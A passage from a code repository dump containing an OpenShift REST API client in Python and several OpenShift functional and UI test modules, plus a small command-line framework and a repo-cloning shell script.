\"\"\"\n params: {name, type, key}\n \"\"\"\n if not kwargs.has_key('key'):\n # use a default path\n sshkey = '~/.ssh/id_rsa.pub'\n else:\n sshkey = kwargs['key']\n ssh_path = os.path.expanduser(sshkey)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n if kwargs.has_key('impersonate'):\n self.headers = {'X-Impersonate-User':kwargs['impersonate']}\n\n if not kwargs.has_key('name'):\n\n kwargs['name'] = 'default'\n \n if not kwargs.has_key('type'):\n kwargs['type'] = 'ssh-rsa'\n \n data_dict = {\n 'name': kwargs['name'],\n 'type': kwargs['type'],\n 'content': ssh_key_str\n }\n\n params = urllib.urlencode(data_dict)\n status, raw_response = self.rest.request(method='POST', url='/user/keys', params=params)\n return (status, raw_response)\n\n def key_update(self, kwargs):\n \"\"\"\n params: {name, type, key}\n \"\"\"\n if not kwargs.has_key('key'):\n # use a default path\n sshkey = '~/.ssh/id_rsa.pub'\n else:\n sshkey = kwargs['key']\n ssh_path = os.path.expanduser(sshkey)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n if kwargs.has_key('impersonate'):\n self.headers = {'X-Impersonate-User':kwargs['impersonate']}\n\n if not kwargs.has_key('name'):\n\n kwargs['name'] = 'default'\n\n if not kwargs.has_key('type'):\n kwargs['type'] = 'ssh-rsa'\n\n data_dict = {\n 'name': kwargs['name'],\n 'type': kwargs['type'],\n 'content': ssh_key_str\n }\n\n params = urllib.urlencode(data_dict)\n status, raw_response = self.rest.request(method='POST', url='/user/keys', params=params)\n return (status, raw_response)\n\n ##### /domains\n #@conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_create(self, name, impersonate=None):\n log.debug(\"Creating domain '%s'\" % name)\n TESTDATA = {\n 'id': name,\n 'rhlogin': self.user\n }\n\n params = urllib.urlencode(TESTDATA)\n\n if impersonate:\n self.headers['X-Impersonate-User'] = impersonate\n\n self.rest.request(method='POST', url='/domains', 
params=params)\n \"\"\"\n if self.rest.response.status == 201:\n log.info(\"Domain name '%s' created successfully.\" % name)\n else:\n log.info(\"Domain creation failed, reason: %s\" % self.rest.response.json['messages'])\n \"\"\"\n return self.rest.response.status, self.rest.response.body\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_delete(self, domain_name=None, force=True):\n \"\"\" destroy a user's domain; if no name is given, figure it out \"\"\"\n if domain_name is None:\n status, res = self.domain_get()\n domain_name = res\n\n url, method = self.get_href('/domains', 'delete', domain_name)\n #log.info(\"URL: %s\" % url)\n #res = self.rest.response.data[0]['links']['DELETE']\n params = None\n if force:\n params = urllib.urlencode({'force': 'true'})\n if url:\n (status, raw_response) = self.rest.request(method=method, url=url, params=params)\n return (status, raw_response)\n else: ## problem: no matching domain was found\n return (url, None)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_get(self, name=None):\n log.debug(\"Getting domain information...\")\n url, method = self.get_href('/domains', 'get', name)\n if url == 'Not Found':\n return ('Not Found', None)\n else:\n (status, raw_response) = self.rest.request(method=method, url=url)\n\n if status == 'OK':\n return (status, self.rest.response.json['data']['id'])\n return (status, raw_response)\n\n def domain_update(self, new_name):\n params = urllib.urlencode({'id': new_name})\n url, method = self.get_href(\"/domains\", 'update')\n (status, res) = self.rest.request(method=method, url=url, params=params)\n return (status, res)\n\n def app_list(self):\n url, method = self.get_href('/domains', 'list_applications')\n (status, res) = self.rest.request(method=method, url=url)\n return (status, self.rest.response.json['data'])\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def app_create(self, app_name, app_type, scale='false', init_git_url=None, template_uuid=None):\n url, method = self.get_href('/domains', 'add_application')\n #valid_options = self.rest.response.json['data'][0]['links']['ADD_APPLICATION']['optional_params'][0]['valid_options']\n #if app_type not in valid_options:\n # log.error(\"The app type you specified '%s' is not supported!\" % app_type)\n # log.debug(\"supported apps types are: %s\" % valid_options)\n if init_git_url:\n data_dict = {'name':app_name, 'scale': scale, 'init_git_url': init_git_url}\n else:\n data_dict = {'name':app_name, 'scale': scale }\n\n params = urllib.urlencode(data_dict)\n if type(app_type) is list:\n is_str = all(isinstance(i, str) for i in app_type)\n if is_str:\n carts = \"&\" + urllib.urlencode([('cartridges[]', i) for i in app_type])\n else: # it's a list of dictionaries {'name': <cart_name>}\n carts = \"&\" + urllib.urlencode([('cartridges[]', i['name']) for i in app_type])\n else:\n cart_param = {\n 'cartridges' : app_type,\n }\n carts = \"&\" + urllib.urlencode(cart_param)\n if template_uuid:\n # a template replaces the cartridge list\n data_dict['template'] = template_uuid\n params = urllib.urlencode(data_dict)\n else:\n params = params + carts\n (status, res) = self.rest.request(method=method, url=url, params=params)\n return (status, res)\n\n ##### /cartridges\n def cartridges(self):\n (status, raw_response) = self.rest.request(method='GET', url='/cartridges')\n if status == 'OK':\n # return a list of cartridges that are supported\n return (status, self.rest.response.json['data'])\n else:\n return (status, raw_response)\n\n ##### /api get a list of supported operations\n def api(self):\n #log.debug(\"Getting supported APIs...\")\n (status, raw_response) = 
self.rest.request(method='GET', url='/api')\n return (status, raw_response)\n\n ##### helper functions\n def do_action(self, kwargs):\n op = kwargs['op_type']\n if op == 'cartridge':\n status, res = self.cartridge_list(kwargs['app_name'])\n elif op == 'keys':\n status, res = self.keys_list()\n\n json_data = self.rest.response.json\n action = kwargs['action']\n name = kwargs['name']\n raw_response = None\n for data in json_data['data']:\n if data['name'] == name:\n params = data['links'][action]\n log.debug(\"Action: %s\" % action)\n if len(params['required_params']) > 0:\n # construct require parameter dictionary\n data = {}\n for rp in params['required_params']:\n param_name = rp['name']\n if kwargs['op_type'] == 'cartridge':\n data[param_name] = action.lower()\n else:\n data[param_name] = kwargs[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n (status, raw_response) = self.rest.request(method=params['method'], \n url=params['href'],\n params=data)\n return (status, self.rest.response.json)\n\n return (status, raw_response)\n\n #### application tempalte\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def app_templates(self):\n (status, raw_response) = self.rest.request(method='GET', url='/application_template')\n if status == 'OK':\n return (status, self.rest.response.json)\n else:\n return (status, raw_response)\n\n ##### keys\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_delete(self, key_name):\n \"\"\"\n li.key_delete('ssh_key_name')\n\n \"\"\"\n params = {\"action\": 'DELETE', 'name': key_name, \"op_type\": 'keys'}\n return self.do_action(params)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS) \n def key_update(self, kwargs): #key_name, key_path, key_type='ssh-rsa'):\n \"\"\"\n li.key_update({'name': 'new_key_name', 'key': new_key_path})\n\n \"\"\"\n key_path = kwargs['key']\n key_name = kwargs['name']\n if kwargs.has_key('key_type'):\n key_type = kwargs['key_type']\n else:\n key_type = 'ssh-rsa'\n ssh_path = os.path.expanduser(key_path)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n params = {'op_type':'keys', 'action': 'UPDATE', 'name': key_name, 'content': ssh_key_str, 'type': key_type}\n return self.do_action(params)\n \n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_get(self, name):\n \"\"\"\n li.key_get('target_key_name')\n returns the actual key content :$\n \n \"\"\"\n #params = {'action': 'GET', 'name': name, 'op_type': 'keys'}\n url = \"/user/keys/\" + name\n (status, raw_response) = self.rest.request(method='GET', url=url)\n if status == 'OK':\n return status, self.rest.response.json['data']\n else:\n return (status, raw_response)\n\n def key_action(self, kwargs):\n status, res = self.keys_list()\n json_data = self.rest.response.json\n action = kwargs['action']\n name = kwargs['name']\n for data in json_data['data']:\n if data['name'] == name:\n params = data['links'][action]\n log.debug(\"Action: %s\" % action)\n if len(params['required_params']) > 0:\n # construct require parameter dictionary\n data = {}\n for rp in params['required_params']:\n param_name = rp['name']\n data[param_name] = kwargs[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n break\n (status, raw_response) = self.rest.request(method=params['method'], \n url=params['href'], \n params=data)\n return (status, raw_response)\n\n\n\n\n\n ##### apps\n @timeit\n def app_create_scale(self, app_name, app_type, scale='true'):\n return self.app_create(app_name=app_name, app_type=app_type, 
scale=scale)\n \n @timeit\n def app_delete(self, app_name):\n params = {'action': 'DELETE', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_start(self, app_name): \n params = {\"action\": 'START', 'app_name': app_name}\n return self.app_action(params)\n @timeit \n def app_stop(self, app_name):\n params = {\"action\": 'STOP', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_restart(self, app_name):\n params = {\"action\": 'RESTART', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_force_stop(self, app_name):\n params = {\"action\": 'FORCE_STOP', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_get_descriptor(self, app_name):\n params = {'action': 'GET', 'app_name': app_name}\n return self.app_action(params)\n \n def app_get(self, app_name):\n params = {'action': 'GET', 'app_name': app_name}\n status, res = self.app_action(params)\n if status == 'OK':\n data_json = self.rest.response.json['data']\n return status, data_json\n else:\n return status, res\n\n #############################################################\n # event related functions\n #############################################################\n def app_scale_up(self, app_name):\n params = {'action': 'SCALE_UP', 'app_name': app_name}\n return self.app_action(params)\n\n def app_scale_down(self, app_name):\n params = {'action': 'SCALE_DOWN', 'app_name': app_name}\n return self.app_action(params)\n \n def app_add_alias(self, app_name, alias):\n params = {'action': 'ADD_ALIAS', 'app_name': app_name, 'alias': alias}\n return self.app_action(params)\n \n def app_remove_alias(self, app_name, alias):\n params = {'action': 'REMOVE_ALIAS', 'app_name': app_name, 'alias': alias}\n return self.app_action(params)\n\n def app_get_estimates(self):\n url, method = self.get_href('/estimates', 'get_estimate')\n (status, res) = self.rest.request(method=method, url=url)\n return (status, self.rest.response.json['data'])\n\n #params = {'action': 'GET_ESTIMATE'}\n #return self.app_action(params)\n \n def app_action(self, params):\n \"\"\" generic helper function that is capable of doing all the operations\n for application\n \"\"\"\n # step1. 
find the url and method\n status, res = self.app_list()\n\n app_found = False\n action = params['action']\n if params.has_key('app_name'):\n app_name = params['app_name']\n if params.has_key('cartridge'):\n cart_name = params['cartridge']\n\n for app in res:\n #for app in res['data']:\n\n if app['name'] == app_name:\n # found match, now do your stuff\n params_dict = app['links'][action]\n method = params_dict['method']\n log.info(\"Action: %s\" % action)\n data = {}\n if len(params_dict['required_params']) > 0:\n param_name = params_dict['required_params'][0]['name']\n rp = params_dict['required_params'][0]\n #data[param_name] = cart_name #'name'] = rp['name']\n for rp in params_dict['required_params']:\n # construct the data \n param_name = rp['name']\n if param_name == 'event':\n if isinstance(rp['valid_options'],list):\n data[param_name] = rp['valid_options'][0] \n else:\n data[param_name] = rp['valid_options']\n elif param_name == 'name':\n data[param_name] = params['cartridge']\n else:\n data[param_name] = params[param_name] #cart_name #params['op_type']\n #data[param_name] = params[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n req_url = params_dict['href']\n #print \"DATA: %s, URL: %s, METHOD: %s \" % (data, req_url, method)\n (status, raw_response) = self.rest.request(method=method, url=req_url, params=data)\n app_found = True\n return (status, raw_response)\n if not app_found:\n log.error(\"Can not find app matching your request '%s'\"% app_name)\n return (\"Error\", None)\n\n def get_gears(self, app_name, domain_name=None):\n \"\"\" return gears information \"\"\"\n params = {\"action\": 'GET_GEAR_GROUPS', 'app_name': app_name}\n status, res = self.app_action(params)\n gear_count = 0\n for gear_group in self.rest.response.json['data']:\n gear_count += len(gear_group['gears'])\n return (self.rest.response.json['data'], gear_count) \n\n ################################\n # cartridges\n ################################\n def cartridge_list(self, app_name):\n params = {\"action\": 'LIST_CARTRIDGES', 'app_name': app_name}\n return self.app_action(params)\n\n def cartridge_add(self, app_name, cartridge):\n params = {\"action\": 'ADD_CARTRIDGE', 'app_name': app_name,\n 'cartridge': cartridge}\n status, res = self.app_action(params)\n return (status, self.rest.response.json['messages'])\n \n def cartridge_delete(self, app_name, name):\n params = {\"action\": 'DELETE', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_start(self, app_name, name):\n params = {\"action\": 'START', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_stop(self, app_name, name):\n params = {\"action\": 'STOP', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_restart(self, app_name, name):\n params = {\"action\": 'RESTART', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_reload(self, app_name, name):\n params = {\"action\": 'RELOAD', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_get(self, app_name, name):\n params = {\"action\": 'GET', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n\n\n def app_template_get(self):\n \"\"\" return a list of application templates from an app \"\"\"\n status, res = self.rest.request(method='GET', 
url='/application_template')\n if status == 'OK':\n return (status, self.rest.response.json['data'])\n else:\n return (status, res)\n \n############################################################################\n# helper functions\n############################################################################\n\ndef get_black_list(rest_obj):\n status, res = rest_obj.api()\n json_obj = json.loads(res)\n black_list = json_obj['data']['ADD_DOMAIN']['required_params'][0]['invalid_options']\n return black_list\n\ndef sortedDict(adict):\n keys = adict.keys()\n keys.sort()\n return map(adict.get, keys)\n\ndef perf_test(li):\n cart_types = ['php-5.3']\n od = { \n 1: {'name': 'app_create', 'params': {'app_name': 'perftest'}},\n #2: {'name': 'app_delete', 'params': {'app_name': 'perftest'}},\n }\n sod = sortedDict(od)\n #li.domain_create('blahblah')\n cart_types = ['php-5.3']#'php-5.3', 'ruby-1.8', 'jbossas-7']\n for cart in cart_types:\n for action in sod:\n method_call = getattr(li, action['name'])\n k, v = action['params'].items()[0]\n if action['name'] == 'app_create':\n method_call(v, cart)\n else:\n method_call(v)\n\n\nif __name__ == '__main__':\n (options, args) = config_parser()\n li = Openshift(host=options.ip, user=options.user, passwd=options.password,\n debug=options.DEBUG,verbose=options.VERBOSE)\n #status, res = li.app_get_descriptor('xxxx')\n #status, res = li.get_gears('myjboss')\n #status, res = li.app_get_estimates()\n #status, res = li.domain_get(name=None)\n #app_type = [{'name': 'php-5.3'}, {'name':'mysql-5.1'}, {'name':'phpmyadmin-3.4'}]\n #status, res = li.app_create(app_name=\"app1\", app_type=app_type,\n # init_git_url=\"https://github.com/openshift/wordpress-example\")\n #print \"STAUS: %s\" % status\n #app_type=[\"ruby-1.9\", \"rockmongo-1.1\"]\n #status, res = li.app_create(app_name=\"app4\", app_type=app_type)\n #status, res = li.app_create(app_name=\"app3\", app_type='nodejs-0.6')\n #status, res = li.cartridge_add(app_name='app1', cartridge='mysql-5.1') #restart_app('myruby')\n status, res = li.cartridge_delete(app_name='app1', name='mysql-5.1')\n self.info('xxx', 1)\n #status, res = li.get_gears('27qxjfyjeo')\n #status, res = li.app_get('27qxjfyjeo')\n #self.info(\"xxx\", 1)\n #status, res = li.app_template_get() #app_get_descriptor('myapp2php')\n #li.app_remove_alias('php', 'new_name')\n #li = Openshift(host=\"stg.openshift.redhat.com\")\n #li = Openshift(host='107.20.38.71')\n #status, res = li.domain_create('pppx')\n\n #status, res = li.get_user()\n #gear, count = li.get_gears(app_name='php')\n #self.info(\"xxx\",1 )\n #status, res = li.app_list()\n #self.info(\"xxx\", 1)\n #perf_test(li)\n \n #status, res = li.add_application('abcdefg0123456789012345678901234567890', 'php-5.3')\n #li.create_domain('testbcc09a')\n #status, res = li.get_domain()\n #li.delete_domain(force=True)#delete_domain(\"testapp\")\n #self.info(\"xx\",1 )\n #status, res = li.add_key({'name': 'default', 'key':'~/.ssh/libra_id_rsa.pub'})\n #self.info(\"xxx\", 1)\n #li = Openshift(host='50.16.148.99') #107.21.64.242') \n #status, res = li.get_cartridge(app_name='myphp', name='mongodb-2.2')\n #og.debug(\"STATUS: %s\" % status)\n #status, res = li.reload_cartridge(app_name='myphp', name='phpmyadmin-3.4') #restart_app('myruby')\n #log.debug('STATUS: %s' % status) \n\n \n #status, res = li.delete_domain(force=True)\n #status, res = li.cartridges() \n #status, res = li.list_cartridges('myruby')\n #status, res = li.cartridge_add(app_name='myapp', cartridge='mysql-5.1') #restart_app('myruby')\n #status, 
res = li.cartridge_delete(app_name='myapp', name='mysql-5.1')\n \n #self.info(\"xxx\", 1)\n #status, res = li.delete_cartridge(app_name='myphp', name='mongodb-2.2') #restart_app('myruby')\n #status, res = li.delete_app('myperl')\n #status, res = li.add_application('myperl', 'perl-5.10')\n #status, res = li.delete_app(myperl')\n \n#\n #stat, res = li.create_domain('ab012345678901234567890123456789')\n #stat, res = li.delete_app('ab012345678901234567890123456789')\n #self.info(\"xxx\", 1)\n #status, res = li.get_domain()\n #log.info(\"status: %s\" % status)\n \n #li.add_application('myruby', 'ruby-1.8')\n #li.add_application('myphp', 'php-5.3')\n #status, res = li.update_domain('pnew')\n #self.info(\"xxx\", 1)\n #key = li.get_key('new1') #{'name':'new1'})\n #key_content = li.get_key(name='key1')\n #status, res = li.update_key({'name': 'new1', 'key':'~/.ssh/test.pub'})\n #li.delete_key({'name': 'newkey1', 'key': '~/.ssh/test.pub'})\n\n\n \n" }, { "alpha_fraction": 0.6024896502494812, "alphanum_fraction": 0.6074689030647278, "avg_line_length": 28.365854263305664, "blob_id": "ca622e4412c2f3d8b9a71ac7f63542457071b129", "content_id": "ce11580c2833ceb57704bad3e7879a42d23661e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 74, "num_lines": 41, "path": "/python-simple-cmd/scmd/commands/startproject.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nimport scmd\nfrom scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\nfrom scmd.utils import copy\n\n\nTEMPLATES_PATH = join(scmd.__path__[0], 'templates', 'project')\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"<project_name>\"\n\n def short_desc(self):\n return \"Create new project\"\n\n def long_desc(self):\n return \"Easy to create a new project\"\n\n def run(self, args, opts):\n if len(args) != 1:\n raise UsageError()\n # get project_name, dir path, and template_dir\n project_name = args[0]\n directory = os.getcwd()\n template_dir = os.path.join(scmd.__path__[0], 'templates/project')\n # error if\n if not re.search(r'^[_a-zA-Z]\\w*$', project_name):\n print 'Error: Project names must begin with a letter \\\n and contain only\\n' \\\n 'letters, numbers and underscores'\n sys.exit(1)\n elif exists(project_name):\n print \"Error: directory %r already exists\" % project_name\n sys.exit(1)\n copy.copy_helper(project_name, directory, template_dir)\n\n" }, { "alpha_fraction": 0.7185016870498657, "alphanum_fraction": 0.7287173867225647, "avg_line_length": 28.366666793823242, "blob_id": "d9d01e663777a347bad103467a18deb648c69c6d", "content_id": "685b1bebc6ab6107dc50d31797d95573d64feb9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 881, "license_type": "no_license", "max_line_length": 108, "num_lines": 30, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_prebuilt_wars_without_jenkins import JBossHotDeployPrebuiltWarsWithoutJenkins\n\nclass EWSHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployPrebuiltWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployPrebuiltWarsWithoutJenkins.__init__(self, config)\n 
self.config.application_type = common.app_types['jbossews']\n self.config.war_files = [ \"sample.war\" ]\n self.config.deploy_dir = \"webapps\"\n self.config.summary = \"[US2513] Hot deployment support for Jboss EWS application with pre-built war\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployPrebuiltWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.620581328868866, "alphanum_fraction": 0.6294841766357422, "avg_line_length": 35.371429443359375, "blob_id": "d4d53c569834e9194252e23b7f594bac10545078", "content_id": "53521a68602e4c39c92ae02b5449337d332585f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3819, "license_type": "no_license", "max_line_length": 206, "num_lines": 105, "path": "/automation/open/testmodules/RT/scaling/jbossews2_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\nimport shutil\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport subprocess\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'jbossews2' + common.getRandomString(8)\n try:\n self.app_type = common.app_types[self.get_variant()]\n except:\n self.app_type = common.app_types[\"jbossews2\"]\n\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n common.env_setup()\n\n def finalize(self):\n pass\n\n\n\nclass Jbossews2Mysql(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n common.grep_web_page(\"%s/mysql.jsp?action=insert&size=10\" % (app_url), \"records have been inserted into mysql\", delay=10, count=12)\n\n return common.grep_web_page(\"%s/mysql.jsp?action=show\" % (app_url), \"This is testing data for testing snapshoting and restoring big data in mysql database\", delay=10, count=12)\n\n def prepare_jsp_file(self):\n try:\n mysql = OSConf.get_embed_info(self.app_name,common.cartridge_types['mysql'])\n self.info(mysql)\n except Exception as e:\n self.error(str(e))\n return False\n # Prepare jsp file\n fr = file(\"%s/../cartridge/app_template/bigdata/mysql/mysql.jsp\" % (WORK_DIR), \"r\")\n jsp = fr.read()\n fr.close()\n fw = file(\"%s/src/main/webapp/mysql.jsp\" % (self.app_name), \"w\")\n fw.write(jsp)\n fw.close()\n # Prepare mysql connector\n os.mkdir(\"%s/src/main/webapp/WEB-INF/lib\" % (self.app_name))\n shutil.copyfile(\"%s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar\" % (WORK_DIR), \"%s/src/main/webapp/WEB-INF/lib/mysql-connector-java-5.1.20-bin.jar\" % (self.app_name))\n return True\n\n def test_method(self):\n ret = common.create_app(self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to app\")\n\n ret = self.prepare_jsp_file()\n self.assert_equal(ret, True, \"Failed to prepare jsp file and mysql connector\")\n\n ret = common.command_get_status(\"cd %s 
&& git add . && git commit -amt && git push\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to git push\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work\")\n\n if self.scalable:\n ret = common.scale_up(self.app_name)\n self.assert_equal(ret, 0, \"Failed to scale up app\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work after scale up\")\n\n ret = common.scale_down(self.app_name)\n self.assert_equal(ret, 0, \"Failed to scale down app\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work after scale down\")\n\n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret, 0, \"Failed to remove mysql-5.1 from app\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Jbossews2Mysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5396226644515991, "alphanum_fraction": 0.5433962345123291, "avg_line_length": 21.08333396911621, "blob_id": "d627d098699d17917fdc94b588838356a03cb2b4", "content_id": "feb936a1d1c6b77b1228322931bdfb1cbf9d3364", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 265, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/automation/open/prepare_testing_data/clone_repo.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrhlogin=\"xx\"\npasswd=\"redhat\"\n\napp_info=`rhc domain show -l ${rhlogin} -p ${passwd}`\nfor i in `echo \"${app_info}\" | grep ssh | awk -F'Git URL: ' '{print $2}'`; do\n echo \"Git cloning $i\"\n rm -rf $i\n git clone $i\n echo \"============\"\ndone\n" }, { "alpha_fraction": 0.5831775665283203, "alphanum_fraction": 0.6037383079528809, "avg_line_length": 23.31818199157715, "blob_id": "ce189e91ee56b8c4c08f631fdddd37f25d00859b", "content_id": "a9cbbb92831a575895f225416e87c7577fa0d2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "no_license", "max_line_length": 54, "num_lines": 22, "path": "/python-simple-cmd/scmd/commands/sdivide.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"divide_arg1 divide_arg2\"\n\n def short_desc(self):\n return \"Do dividion\"\n\n def long_desc(self):\n return \"Divide arg1 and arg2, and give result\"\n\n def run(self, args, opts):\n if len(args) != 2:\n raise UsageError()\n arg1 = args[0]\n arg2 = args[1]\n result = int(arg1) / int(arg2)\n print \"The dividion result is: %d.\" % result\n" }, { "alpha_fraction": 0.6756218671798706, "alphanum_fraction": 0.6756218671798706, "avg_line_length": 28.558822631835938, "blob_id": "0a04b4afdf5e76ce3d2cf2d50cabf002001511c2", "content_id": "fc87e5f7c79016e75afabcaaf899baf9e65eb439", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 87, "num_lines": 34, "path": "/automation/open/testmodules/RT/quick_start/quick_start_sinatra.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = 
os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartSinatra(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Sinatra\"\n self.config.git_upstream_url = \"git://github.com/openshift/sinatra-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"the time where this server lives is\"\n \t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartSinatra)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6527243256568909, "alphanum_fraction": 0.6562312841415405, "avg_line_length": 59.890625, "blob_id": "653c222dd5d76fc599b0947077bc80bcda3314c8", "content_id": "3db278df387f0f36bf38be86b9205e9208def9f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11691, "license_type": "no_license", "max_line_length": 213, "num_lines": 192, "path": "/automation/open/testmodules/UI/web/tc_home.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass HomePage(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.binary= \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test__a_check_home_navigation_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='main_nav']/div/ul/li[1]/a\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Express')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n\n def test_aa_check_flex_nav_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Flex')]\")\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n \n # baseutils.click_element_by_link_text(self,\"POWER\")\n # baseutils.check_title(self,\"OpenShift by Red Hat | Power\")\n\n def test_ab_check_community_nav_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Community')]\")\n time.sleep(5) \n baseutils.check_title(self,\"Red Hat OpenShift Community\")\n baseutils.go_back(self)\n time.sleep(5)\n baseutils.click_element_by_link_text(self,\"Sign in\")\n baseutils.is_element_displayed(self,By.ID,\"login-form\")\n # baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n \n\n def test__b_check_home_links(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n 